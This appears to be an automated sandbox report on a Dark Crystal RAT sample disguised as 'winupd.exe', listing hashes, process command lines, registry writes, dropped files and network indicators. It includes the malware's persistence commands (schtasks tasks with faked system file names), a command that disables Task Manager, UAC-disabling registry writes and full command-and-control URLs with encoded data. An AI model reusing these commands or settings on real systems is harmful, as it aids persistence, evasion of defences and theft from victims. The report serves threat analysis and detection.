| Field | Value |
|---|---|
| File name: | winupd.exe |
| Full analysis: | https://app.any.run/tasks/ca589059-a359-4f4b-8cc3-0e27a5664575 |
| Verdict: | Malicious activity |
| Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
| Analysis date: | February 15, 2025, 21:35:07 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | 2ECF13B2FFDEC170C8C741B8BC4A20C5 |
| SHA1: | D40C32E97D65A877816A015CFFE2A8940DEBEA0D |
| SHA256: | 70C558209D7201E690991BE17A01C6EF7F5B14775F2CFB288F0ABAFA43187FE2 |
| SSDEEP: | 98304:ZFrKdQOUq0sil6vpFol2Zj0UJNdnuRa7OTuvF7/N/i1AS1lNPOJISy4EwWBQdVEK:ZUK4yPlT38 |
| Extension | Identified type (match %) |
|---|---|
| .exe | Win32 Executable (generic) (52.9) |
| .exe | Generic Win/DOS Executable (23.5) |
| .exe | DOS Executable Generic (23.5) |
| PE header field | Value |
|---|---|
| MachineType: | Intel 386 or later, and compatibles |
| TimeStamp: | 2020:12:01 18:00:55+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 201216 |
| InitializedDataSize: | 114176 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1ec40 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 440 | schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\PCHealthCheck\kk-KZ\dllhost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Task Scheduler Configuration Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 444 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a2544bd3-86cd-4b84-aac7-a7b49dd1df48.vbs" | C:\Windows\System32\wscript.exe | — | RuntimeBroker.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Windows Based Script Host; Version: 5.812.10240.16384 |
| 904 | "C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe" | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe | — | cmd.exe | User: admin; Integrity Level: HIGH; Exit code: 0; Version: 5.15.2.0 |
| 1348 | schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Task Scheduler Configuration Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 1544 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.bat" " | C:\Windows\SysWOW64\cmd.exe | — | winupd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Command Processor; Exit code: 255; Version: 10.0.19041.3636 (WinBuild.160101.0800) |
| 1556 | schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Application Data\winlogon.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Task Scheduler Configuration Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 1616 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 1668 | schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\found.000\dir_00000002.chk\RuntimeBroker.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Task Scheduler Configuration Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 1876 | schtasks.exe /create /tn "uhssvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\uhssvc.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Task Scheduler Configuration Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 1876 | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Registry Console Tool; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 3984 | winupd.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids | write | VBEFile | |
| 3984 | winupd.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids | write | VBSFile | |
| 4740 | comServer.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | EnableLUA | 0 |
| 4740 | comServer.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | ConsentPromptBehaviorAdmin | 0 |
| 4740 | comServer.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | PromptOnSecureDesktop | 0 |
| 4740 | comServer.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 | write | CheckSetting | 23004100430042006C006F00620000000000000000000000010000000000000000000000 |
| 2136 | ShellExperienceHost.exe | \REGISTRY\A\{5990eaaa-9b89-2e14-ce82-5d4afb9ebbe0}\LocalState | write | PeekBadges | 5B005D00000060E89688F17FDB01 |
| 4740 | comServer.exe | HKEY_CURRENT_USER\SOFTWARE\3645904f5767e188620c7a665cb0a97161785213 | write | a9a2250d8cd79de1542cb78d3d051e7b79af13d9 | WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxTdXJyb2dhdGVhZ2VudHdpbmhvc3RTdmNcXGNvbVNlcnZlci5leGUiLCJDOlxcUHJvZ3JhbSBGaWxlc1xcV2luZG93cyBOVFxcbHNhc3MuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXENvbW1vbiBGaWxlc1xcU2VydmljZXNcXHVoc3N2Yy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXEFwcGxpY2F0aW9uIERhdGFcXHdpbmxvZ29uLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxQQ0hlYWx0aENoZWNrXFxray1LWlxcZGxsaG9zdC5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcTXVzaWNcXFN5c3RlbVNldHRpbmdzLmV4ZSJd |
| 1876 | reg.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | DisableTaskMgr | 1 |
| 4320 | comServer.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | write | EnableLUA | 0 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\file.vbs | text | 677CC4360477C72CB0CE00406A949C61 | F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B |
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.bat | text | B67C9BB396B21E0E95E7DD8F7C60D663 | EA9788B3ACCECECD55CBAC9547BDEACC5FFCA6AFCC539F3EBCA6E6E145A628EE |
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe | executable | 19AD0B4DE848E37C6CF895F988A4506E | A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C |
| 4740 | comServer.exe | C:\Program Files\Windows NT\lsass.exe | executable | 19AD0B4DE848E37C6CF895F988A4506E | A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C |
| 4740 | comServer.exe | C:\Users\Default\AppData\Roaming\winlogon.exe | executable | 19AD0B4DE848E37C6CF895F988A4506E | A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C |
| 4740 | comServer.exe | C:\Program Files\PCHealthCheck\kk-KZ\dllhost.exe | executable | 19AD0B4DE848E37C6CF895F988A4506E | A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C |
| 4320 | comServer.exe | C:\Windows\InputMethod\SHARED\5b884080fd4f94 | text | 8CFC8C28BB4950B8234AEACD2FB9D96A | 0ACE73A57235432CF87B3BDA4B4EFF44566D7926E5FCA1DF2629EBD106335673 |
| 4740 | comServer.exe | C:\Program Files\Windows NT\6203df4a6bafc7 | text | C3F871C12DBDB68DD9F2D22D8305D1F0 | A5EC3D0C7CE0AB817E18274E09DC859D1D4DF1E7D9CBD9777A57CFC74718B279 |
| 4320 | comServer.exe | C:\Program Files\PCHealthCheck\audiodg.exe | executable | 19AD0B4DE848E37C6CF895F988A4506E | A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C |
| 4320 | comServer.exe | C:\Users\admin\AppData\Local\Temp\eKkRp5CLZW | text | 2A3BD2179AE3105C3E31DBE022CF2945 | 380DA32CAD57497A167AFB748B1DF355BD3D3CC87BC1AD9310A3D471C29365DA |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| 4300 | svchost.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| 4300 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| 4712 | MoUsoCoreWorker.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| 2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
| 2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&714839bee31f9c5256b219d4a9de7452=d1nI2UzY4YTN5YjZyUWOwQDNxEWNwcjN1czM1IWN0UTN3ATMmhTNiNWMxIiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
| 2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&8840cb222f57329aad528a7e4bfbb468=d1nIkJ1VaBjSYlFMOhUS1xmMaFDeHV1ZwMUSOJkRJdXVq9UMNp2T1E0UOlXQq1kdVRVT2lkeXJiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
| 2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiI5ATMykzM0MjNhJDOmhTZ4MDMkRGNhJGM5UmY1YWNhRDOiRGO5QGZlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| — | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 4300 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| — | — | 2.23.227.215:443 | — | Ooredoo Q.S.C. | QA | unknown |
| 4300 | svchost.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
| 4712 | MoUsoCoreWorker.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
| 4712 | MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
| 4300 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
| 4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
| Domain | IP | Reputation |
|---|---|---|
| google.com | — | whitelisted |
| crl.microsoft.com | — | whitelisted |
| www.microsoft.com | — | whitelisted |
| settings-win.data.microsoft.com | — | whitelisted |
| sigmabioaef.atwebpages.com | — | malicious |
| ipinfo.io | — | whitelisted |
| self.events.data.microsoft.com | — | whitelisted |
| PID | Process | Class | Message |
|---|---|---|---|
| 2972 | RuntimeBroker.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
| 2972 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup SSL Cert Observed (ipinfo .io) |
| 2972 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
| 2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) |
| — | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ipinfo.io |
| 2972 | RuntimeBroker.exe | Misc activity | ET HUNTING Suspicious HTTP POST to Free Web Host Atwebpages |
| 2972 | RuntimeBroker.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |